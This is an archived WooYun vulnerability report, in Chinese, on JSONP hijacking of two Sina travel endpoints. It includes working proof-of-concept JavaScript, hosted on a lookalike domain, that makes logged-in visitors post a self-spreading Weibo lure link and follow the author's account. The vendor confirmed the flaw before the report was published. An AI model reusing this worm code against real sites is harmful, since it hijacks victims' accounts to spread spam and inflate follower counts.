新浪微博JSONP劫持之点我链接开始微博蠕虫+刷粉丝

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171499

漏洞标题：新浪微博JSONP劫持之点我链接开始微博蠕虫+刷粉丝

漏洞作者： zhchbin

提交时间：2016-01-20 22:34

修复时间：2016-03-05 09:52

公开时间：2016-03-05 09:52

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-20：细节已通知厂商并且等待厂商处理中
2016-01-21：厂商已经确认，细节仅向厂商公开
2016-01-31：细节向核心白帽子及相关领域专家公开
2016-02-10：细节向普通白帽子公开
2016-02-20：细节向实习白帽子公开
2016-03-05：细节向公众公开

简要描述：

JSONP劫持，域名是sina.com.cn的子域，就报给新浪吧。放了快一个月，再不发我怕我控制不住真的去玩蠕虫，刷粉丝了。

详细说明：

0x01 发微博
在新浪旅游的攻略页面中有个提问的功能，提示“此问题会同步到你的新浪微博”。

http://travel.sina.com.cn/fj_sanming_685-xiangqing-gonglue/

具体接口如下：

http://u.travel.sina.com.cn/api-i/qa/sendweibo?content=asdf1&callback=jQuery17206884582478087395_1452354554166&_=1452354673975

这个接口是JSONP的形式，有检查referer，但是不严格，可以轻松绕过，可以绕过的referer例子：

http://travel.sina.com.cn.zhchbin.xyz/

0x02 关注
有些攻略页面会嵌入一些旅行网的微博，上面有关注功能，比如：

http://travel.sina.com.cn/aolanduo_2998-xiangqing-gonglue/

具体接口如下：

http://data.travel.sina.com.cn/award/friendships.php?uid=1684037597&times=1453205469390&callback=jQuery172005376373999752104_1453205445886&_=1453205469391

这个接口也是JSONP，没有任何检查，直接劫持即可。
通过这两个接口，我就可以成为网红了应该，劫持发微博蠕虫，同时刷粉丝！

漏洞证明：

登录微博，点我链接：

http://travel.sina.com.cn.zhchbin.xyz/travel_jsonp.html

测试代码：

<script type="text/javascript" src="http://apps.bdimg.com/libs/jquery/2.1.4/jquery.js"></script>
<script>
$(function() {
  var sendweibo = 'http://u.travel.sina.com.cn/api-i/qa/sendweibo?'
  var content = "这里有好东西，赶紧看，你懂得！http://travel.sina.com.cn.zhchbin.xyz/travel_jsonp.html"
  sendweibo = sendweibo + 'content=' + content + '&_=' + Date.now();
  $.ajax({
    url: sendweibo,
    jsonp: "callback",
    dataType: "jsonp",
    success: function(response) {
      console.log(response);
    }
  });
  var follow_me = 'http://data.travel.sina.com.cn/award/friendships.php?uid=1904533355&times=' + Date.now();
  $.ajax({
    url: follow_me,
    jsonp: "callback",
    dataType: "jsonp",
    success: function(response) {
      console.log(response);
    }
  });
});
</script>

修复方案：

修复JSONP劫持
欢迎关注我微博！！http://weibo.com/zhchbin

版权声明：转载请注明来源 zhchbin@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2016-01-21 10:03

厂商回复：

感谢支持，漏洞修复中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171499

漏洞标题：新浪微博JSONP劫持之点我链接开始微博蠕虫+刷粉丝

相关厂商：新浪

漏洞作者： zhchbin

提交时间：2016-01-20 22:34

修复时间：2016-03-05 09:52

公开时间：2016-03-05 09:52

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zhchbin@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171499

漏洞标题：新浪微博JSONP劫持之点我链接开始微博蠕虫+刷粉丝

相关厂商：新浪

漏洞作者： zhchbin

提交时间：2016-01-20 22:34

修复时间：2016-03-05 09:52

公开时间：2016-03-05 09:52

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0171499"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zhchbin@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：